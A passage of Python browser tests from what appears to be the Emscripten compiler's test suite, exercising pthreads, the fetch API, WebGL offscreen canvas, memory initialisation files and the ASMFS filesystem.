def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1'], also_asmjs=True)
# Test the -s PTHREAD_HINT_NUM_CORES=x command line variable.
@requires_threads
def test_pthread_num_logical_cores(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_HINT_NUM_CORES=2'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
# Test that --separate-asm works with -s USE_PTHREADS=1.
@requires_threads
def test_pthread_separate_asm_pthreads(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '--profiling'])
# Test the operation of Module.pthreadMainPrefixURL variable
@requires_threads
def test_pthread_custom_pthread_main_url(self):
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'cdn'))
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
'''))
# Test that it is possible to define "Module.locateFile" string to locate where pthread-main.js will be loaded from.
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test.html'])
shutil.move('pthread-main.js', os.path.join('cdn', 'pthread-main.js'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where pthread-main.js will be loaded from.
open(self.in_dir('shell2.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "pthread-main.js") return "cdn/pthread-main.js"; else return filename; }, '))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test2.html'])
try_delete('pthread-main.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'TOTAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2', '-s', 'WASM=0']]:
for args in [[], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2', '-s', 'WASM=0']]:
args = ['-s', 'BINARYEN_ASYNC_COMPILATION=0']
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
@no_wasm_backend('MAIN_THREAD_EM_ASM() not yet implemented in Wasm backend')
def test_main_thread_em_asm_signatures(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=[])
@no_wasm_backend('MAIN_THREAD_EM_ASM() not yet implemented in Wasm backend')
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# test atomicrmw i64
@requires_threads
def test_atomicrmw_i64(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
run_process([PYTHON, EMCC, path_from_root('tests', 'atomicrmw_i64.ll'), '-s', 'USE_PTHREADS=1', '-s', 'IN_TEST_HARNESS=1', '-o', 'test.html', '-s', 'WASM=0'])
self.run_browser('test.html', None, '/report_result?0')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'], timeout=30)
def test_meminit_pairs(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join(''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256))
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_meminit_big(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join([''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256)] * 256)
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
assert len(d) > (1 << 27) # more than 32M memory initializer
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
def test_separate_asm(self):
for opts in [['-O0'], ['-O1'], ['-O2'], ['-O2', '--closure', '1']]:
print(opts)
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
run_process([PYTHON, EMCC, 'src.cpp', '-o', 'test.html', '-s', 'WASM=0'] + opts)
self.run_browser('test.html', None, '/report_result?0')
print('run one')
open('one.html', 'w').write('<script src="test.js"></script>')
self.run_browser('one.html', None, '/report_result?0')
print('run two')
run_process([PYTHON, path_from_root('tools', 'separate_asm.py'), 'test.js', 'asm.js', 'rest.js'])
open('two.html', 'w').write('''
<script>
var Module = {};
</script>
<script src="asm.js"></script>
<script src="rest.js"></script>
''')
self.run_browser('two.html', None, '/report_result?0')
print('run hello world')
self.clear()
assert not os.path.exists('tests.asm.js')
self.btest('browser_test_hello_world.c', expected='0', args=opts + ['-s', 'WASM=0', '--separate-asm'])
assert os.path.exists('test.asm.js')
os.unlink('test.asm.js')
print('see a fail')
self.run_browser('test.html', None, '[no http server activity]', timeout=5) # fail without the asm
def test_emterpretify_file(self):
open('shell.html', 'w').write('''
<!--
{{{ SCRIPT }}} // ignore this, we do it ourselves
-->
<script>
var Module = {};
var xhr = new XMLHttpRequest();
xhr.open('GET', 'code.dat', true);
xhr.responseType = 'arraybuffer';
xhr.onload = function() {
Module.emterpreterFile = xhr.response;
var script = document.createElement('script');
script.src = "test.js";
document.body.appendChild(script);
};
xhr.send(null);
</script>
''')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '--shell-file', 'shell.html', '-s', 'ASSERTIONS=1'])
assert os.path.exists('code.dat')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '-s', 'ASSERTIONS=1'])
assert os.path.exists('code.dat')
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
run_process([PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'in_flight_memfile_request.c')).read()))
run_process([PYTHON, EMCC, 'src.cpp', '-o', 'test.js'] + opts)
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
def test_binaryen_interpreter(self):
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'BINARYEN=1', '-s', 'BINARYEN_METHOD="interpret-binary"'])
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'BINARYEN=1', '-s', 'BINARYEN_METHOD="interpret-binary"', '-O2'])
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'BINARYEN_ASYNC_COMPILATION=1'], 1), # force it on
(['-O1', '-s', 'BINARYEN_ASYNC_COMPILATION=0'], 0), # force it off
(['-s', 'BINARYEN_ASYNC_COMPILATION=1', '-s', 'BINARYEN_METHOD="interpret-binary"'], 0), # try to force it on, but have it disabled
]:
print(opts, expect)
self.btest('binaryen_async.c', expected=str(expect), args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest('binaryen_async.c', expected='1', args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
def test_manual_wasm_instantiate(self):
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(os.path.join(path_from_root('tests/manual_wasm_instantiate.cpp'))).read()))
run_process([PYTHON, EMCC, 'src.cpp', '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN=1'])
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), os.path.join(self.get_dir(), 'manual_wasm_instantiate.html'))
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_binaryen_worker(self):
self.do_test_worker(['-s', 'WASM=1'])
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where pthread-main.js will be loaded from.
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'cdn'))
open('shell2.html', 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
subprocess.check_call([PYTHON, EMCC, 'src.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=1', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest('benchmark_utf8.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest('benchmark_utf16.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see #7374')
@requires_threads
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@no_chrome('see #7374')
@requires_threads
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
@no_chrome('see #7374')
@requires_threads
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1'])
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'])
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_graphics_hardware
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for args in [[], ['-DTEST_OFFSCREEN_CANVAS=1'], ['-DTEST_OFFSCREEN_CANVAS=2']]:
cmd = args + ['-s', 'USE_PTHREADS=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'GL_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD=1']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
cmd = args1 + args2 + ['-s', 'USE_PTHREADS=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'GL_DEBUG=1']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
# Tests the feature that shell html page can preallocate the typed array and place it to Module.buffer before loading the script page.
# In this build mode, the -s TOTAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this was is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest('test_preallocated_heap.cpp', expected='1', args=['-s', 'WASM=0', '-s', 'TOTAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/to_memory.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/response_headers.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], also_asmjs=True)
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
@no_chrome('depends on moz-chunked-arraybuffer')
def test_fetch_stream_file(self):
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'TOTAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/sync_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'hello_file.txt'))
self.btest('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_fopen_write(self):
self.btest('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
